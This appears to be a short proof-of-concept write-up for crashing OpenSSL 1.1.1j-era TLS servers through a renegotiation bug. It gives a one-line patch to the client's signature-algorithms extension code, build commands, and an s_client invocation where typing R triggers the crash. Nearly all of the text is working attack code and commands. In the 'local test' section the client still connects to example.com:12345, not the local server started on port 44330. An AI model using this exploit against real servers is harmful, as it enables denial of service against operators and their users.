Download openssl-1.1.1j (1.1.1k probably works too but I didn't test).
Apply this patch (or manually edit the one line):
diff -ur openssl-1.1.1j/ssl/statem/extensions_clnt.c openssl-1.1.1j-patched/ssl/statem/extensions_clnt.c
--- openssl-1.1.1j/ssl/statem/extensions_clnt.c 2021-02-16 12:24:01.000000000 -0300
+++ openssl-1.1.1j-patched/ssl/statem/extensions_clnt.c 2021-03-25 14:56:40.072257668 -0300
@@ -272,7 +272,7 @@
return EXT_RETURN_NOT_SENT;
salglen = tls12_get_psigalgs(s, 1, &salg);
- if (!WPACKET_put_bytes_u16(pkt, TLSEXT_TYPE_signature_algorithms)
+ if (!WPACKET_put_bytes_u16(pkt, (!s->renegotiate) ? TLSEXT_TYPE_signature_algorithms : TLSEXT_TYPE_signature_algorithms_cert)
/* Sub-packet for sig-algs extension */
|| !WPACKET_start_sub_packet_u16(pkt)
/* Sub-packet for the actual list */Compile it:
./config
make
Then connect to the server with the patched openssl:
LD_LIBRARY_PATH=. ./apps/openssl s_client -connect example.com:12345 -tls1_2
Type R[enter] to trigger a renegotiation. This should crash the server if it has renegotiation enabled and didn't get updated to fix this bug.
As a test, let's run a local SSL server. For this you need the vulnerable openssl 1.1.1j or older (you can use the version we just compiled):
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -key key.pem -cert cert.pem -accept 44330
# in another console:
LD_LIBRARY_PATH=. ./apps/openssl s_client -connect example.com:12345 -tls1_2
R
and the server should segfault.